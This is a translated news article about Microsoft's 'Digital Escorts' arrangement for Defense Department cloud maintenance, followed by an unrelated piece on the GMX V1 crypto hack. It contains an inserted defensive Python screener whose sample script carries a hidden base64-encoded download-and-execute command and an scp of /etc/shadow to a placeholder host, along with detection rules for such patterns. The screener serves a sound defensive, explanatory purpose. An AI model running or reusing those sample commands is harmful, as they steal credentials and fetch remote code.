A report on 7/15 revealed that for the past decade Microsoft has had engineers based in China maintain U.S. Department of Defense cloud systems, with U.S. "Digital Escorts" of limited technical ability typing in the commands on their behalf, an arrangement that could give Chinese state hackers an opening to exploit. After the news broke, U.S. Secretary of Defense Pete Hegseth announced a two-week investigation.
The "Digital Escorts" System Exposed After a Decade, Unknown Even to the Defense Department
The system dates back a decade, when Microsoft proposed a "compromise solution" to win U.S. government cloud contracts: overseas engineers, including those in China, would do the technical maintenance, while U.S. personnel holding Defense Department security clearances, the so-called "Digital Escorts", would input the commands.
Microsoft commissioned the outsourcing firms Insight Global and ASM Research to recruit the escorts, mostly veterans or people already holding clearances, at a starting rate of $18 per hour. Their technical skills are limited, and they cannot tell whether a program is malicious. A current escort said:
"We process hundreds of requests from Chinese engineers every month, trying to prevent data 'leakage', but technical training cannot bridge the gap. Even if suspicious commands are discovered, it's practically impossible to detect afterwards; we can only trust that these engineers haven't done anything wrong."
The system ran for years at an extremely low profile; the Defense Information Systems Agency (DISA) said that "no one knows about this".
Chinese Hacker Threats Continue Unabated, Experts Say It's More Dangerous Than TikTok
The Office of the Director of National Intelligence (ODNI) has consistently ranked China as the most active source of hacking threats. In 2023, Chinese hackers broke into senior government officials' cloud email accounts and stole 60,000 State Department emails.
Former CIA and NSA high-ranking official Harry Coker, upon seeing the escort system, directly stated:
"If I were a Chinese intelligence officer, this would be an absolutely perfect infiltration opportunity."
He emphasized that this is far more serious than the concerns over TikTok or over espionage by Chinese students. Former Defense Department CIO John Sherman was also surprised, stating:
"I should have known about this. DISA and the U.S. Cyber Command should review this."
Experts warn that under Chinese law the government can demand data from companies or citizens whenever it deems the purpose "legitimate". In other words, Microsoft employees in China could be compelled to cooperate with intelligence agencies, which would render the escort system ineffective.
How Do the Escorts Operate?
The "Digital Escorts" process works as follows:
Chinese engineers submit maintenance requests: Microsoft engineers in China file request tickets, for example to repair a firewall or check system logs.
U.S. Digital Escorts receive the requests: escorts based in the U.S. meet with the Chinese engineers to discuss them.
Escorts copy the commands: the Chinese engineers supply the commands, and the escorts type them directly into the Defense Department cloud system.
Escorts cannot judge what the code does: if a script named "fix_servers.sh" is in fact malicious, the escorts have no way to tell.
Matthew Erickson, a Microsoft engineer involved in the system's design, candidly admitted that escorts have only a minimal technical understanding; the actual maintenance is still performed by the overseas engineers, and the escorts merely ensure that those engineers cannot see passwords or personal information.
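The failure mode in the last step above is that the escort sees only a file name and a command line. As an added illustration (not code from the article, from Microsoft or from the escort program), the Python below shows the minimum screening an escort-side reviewer could run over a submitted script before typing it: it scans for indicators that should never be waved through without an explanation (base64-decoded or downloaded content piped into a shell, reads of credential files, copies to a remote host) and decodes embedded base64 blobs so that a command hidden inside `echo ... | base64 -d | bash` is inspected as well. Both sample scripts are constructed for this example; the host 203.0.113.7 and the URL example.invalid are reserved documentation values, and the rule list is a starting point, not a complete detector.

```python
import base64
import re

# Constructed sample scripts for this example (not from the article). The file
# name fix_servers.sh is the one the article uses as an illustration; the bodies
# are invented to show a benign version and a tampered version side by side.
BENIGN_SCRIPT = """#!/bin/bash
# fix_servers.sh - restart the web tier and check for errors
set -euo pipefail
systemctl restart nginx
tail -n 200 /var/log/nginx/error.log
"""

# The tampered version keeps the same banner and the same first commands, then
# appends an obfuscated download-and-execute line and an exfiltration of
# /etc/shadow. The hidden payload is encoded here so the example stays self-consistent.
_HIDDEN = base64.b64encode(b"curl -s http://example.invalid/stage2 | sh").decode()
TAMPERED_SCRIPT = BENIGN_SCRIPT + (
    f"echo {_HIDDEN} | base64 -d | bash\n"
    "scp /etc/shadow ops@203.0.113.7:/tmp/\n"
)

# Indicators a reviewer should escalate rather than type in. Hypothetical rule
# set for this example; extend it for the environment being maintained.
RULES = [
    ("decode-to-shell", re.compile(r"base64\s+(-d|--decode)\b[^|\n]*\|\s*(ba|z|da)?sh\b")),
    ("download-to-shell", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b")),
    ("credential-file", re.compile(r"/etc/shadow|\.ssh/|\.aws/credentials|\.kube/config")),
    ("outbound-copy", re.compile(r"\b(scp|rsync|nc|ncat)\b.*\S+@\S+:|/dev/tcp/")),
    ("dynamic-eval", re.compile(r"\beval\b|\$\(\s*(curl|wget)\b")),
]
# Tokens long enough to plausibly be an encoded command rather than a word.
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def _decode_blobs(line):
    """Yield the decoded text of any base64-looking token on the line."""
    for tok in _B64_TOKEN.findall(line):
        try:
            yield base64.b64decode(tok, validate=True).decode("utf-8", "replace")
        except (ValueError, UnicodeDecodeError):
            continue


def screen_script(text):
    """Return (line_number, rule, snippet) findings for a shell script.

    Encoded blobs are decoded and rescanned, so a payload hidden behind
    `echo ... | base64 -d | bash` is reported both for the pipe itself and
    for what the blob actually contains.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # comments (and the shebang) are not executed
        for candidate in [line, *_decode_blobs(line)]:
            for name, rx in RULES:
                if rx.search(candidate):
                    findings.append((lineno, name, candidate.strip()))
    return findings


def verdict(text):
    """'escalate' if any indicator fired, otherwise 'ok-to-run'."""
    return "escalate" if screen_script(text) else "ok-to-run"


if __name__ == "__main__":
    for label, script in (("benign", BENIGN_SCRIPT), ("tampered", TAMPERED_SCRIPT)):
        print(label, verdict(script))
        for lineno, rule, snippet in screen_script(script):
            print(f"  line {lineno}: {rule}: {snippet}")
```

Even with screening of this kind the design problem remains: the person typing the command is still not the person who understands it. A rule list catches the blatant cases; it does not give the escort the judgment the article says they lack.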
Why Does Such a System Exist?
The U.S. Department of Defense requires anyone handling sensitive data to be a U.S. citizen or green card holder. Microsoft's workforce, however, is global, with large numbers of engineers in China, India and Europe, and hiring enough U.S. engineers on short notice would have been prohibitively expensive.
When Microsoft's FedRAMP lobbyist Indy Crowley lobbied the government, he argued that the risk of cloud maintenance was no greater than that of any other government supplier. The Department of Defense had suggested hiring American engineers directly, but Crowley refused, arguing the cost would make the government's move to the cloud prohibitively expensive. Microsoft ultimately settled on the escort system as the cheapest and least disruptive way to satisfy Defense Department rules without a large outlay. (Note: the Federal Risk and Authorization Management Program (FedRAMP) is the U.S. federal government's standardized program for the security assessment, authorization and continuous monitoring of cloud products and services used by federal agencies.)

Internal Personnel Had Warned, But Were Ignored by Senior Management
There were internal opponents at Microsoft who considered the security risk too high, but Tom Keane, then head of the cloud platform, pushed the system through because it let the business expand quickly. The early opponents eventually left, and the escort system went into operation. Microsoft's security managers subsequently warned repeatedly that the escort system was flawed: overseas engineers could see details of the U.S. federal cloud, and the escorts could not detect problems. The warnings did not change the company's decision.

Microsoft Claims It No Longer Uses Chinese Engineers to Support Defense Systems
After the controversy broke, Microsoft said that its China-based engineers do not "directly touch defense systems" and only provide instructions, that escorts receive full technical training and are monitored, and pointed to an internal "Lockbox" review process whose details remain undisclosed.
Microsoft President Brad Smith said at a Senate hearing in May that the company is "removing Chinese nationals from government institutions", without explaining how they came to have access in the first place. Microsoft spokesperson Frank Shaw stated on X (Twitter) on 7/19: "No Chinese engineers will provide technical assistance for US Defense cloud and related services." U.S. Secretary of Defense Pete Hegseth also posted on X (Twitter) on 7/19: "A two-week investigation will be launched to ensure Chinese engineers are completely withdrawn from Department of Defense cloud services, no longer allowing Chinese nationals to participate, and continuing to monitor and counter military infrastructure and network threats."

Risk Warning
Cryptocurrency investment carries high risks, and prices may fluctuate dramatically. You may lose all your principal. Please carefully assess the risks.

Decentralized perpetual contract exchange (Perp DEX) GMX reported a security incident yesterday: its early version, GMX V1, was hacked for a loss of $40 million. The GMX development team stated that V2 and the GMX token were not affected, though community confidence may have been badly shaken.

GLP Price Algorithm Exploited, Hackers Steal $40 Million in Assets
GMX announced yesterday that, following an attack on its GLP asset pool, it had suspended all trading on GMX V1 as an emergency measure and halted GLP minting and redemption on the Arbitrum and Avalanche networks. GLP is GMX's liquidity token, backed by assets including Bitcoin, Ethereum and stablecoins. According to analysis by the on-chain security firm SlowMist, the attack stemmed from a design flaw in GLP's pricing logic: the attacker manipulated the pool's Assets Under Management (AUM) figure in order to drain funds. The GMX team emphasized that the incident affects only V1; V2, the broader market mechanism and the GMX token itself are unaffected.
The team nevertheless urged all users to immediately disable leverage functions and GLP minting to keep the risk from spreading. The team is currently offering a 10% bounty as a white-hat reward, but the attacker appears uninterested. Infini's co-founder lamented: "More heartbreaking than the fall of this generation's Perp DEX giant is that it was robbed of so much money, and the Chinese-speaking community still pays it little attention."
A hero does not die suddenly; he gradually disappears into the torrent of history and people's memories.
Crypto Hacking Losses Reach $2.5 Billion in 2025
GMX is not an isolated case. A Chainalysis report published a few days ago found that in the first half of this year the crypto industry lost a cumulative $2.5 billion to security incidents, with the $1.4 billion Bybit hack the largest of them and the most devastating attack of the year so far.
A few weeks earlier, Iran's largest crypto exchange, Nobitex, was breached by the pro-Israel hacker group Gonjeshke Darande and lost over $81 million, underlining that neither centralized nor decentralized platforms are immune.
From Security Vulnerabilities to National Security Frontlines: North Korean Hackers Become a Global Crisis
Amid the wave of attacks, the U.S. Treasury Department's Office of Foreign Assets Control (OFAC) this week announced a new round of sanctions against the North Korean hacker group Andariel. The named member, Song Kum Hyok, is suspected of attacking multiple crypto companies and defense contractors through social engineering and network intrusion in an attempt to gain internal access and steal core technology and assets.
U.S. authorities stated: "These hacker groups are highly linked to the North Korean regime, with the purpose of using digital assets and crypto trading networks to evade cross-national sanctions, conduct espionage infiltration, and money laundering operations."
The GMX V1 attack shows once again that DeFi protocols need not only sophisticated economic models but also robust defensive mechanisms and continuous risk testing. As attacker tradecraft keeps evolving, and increasingly aligns with state actors, the crypto sector will face even harsher cybersecurity challenges ahead.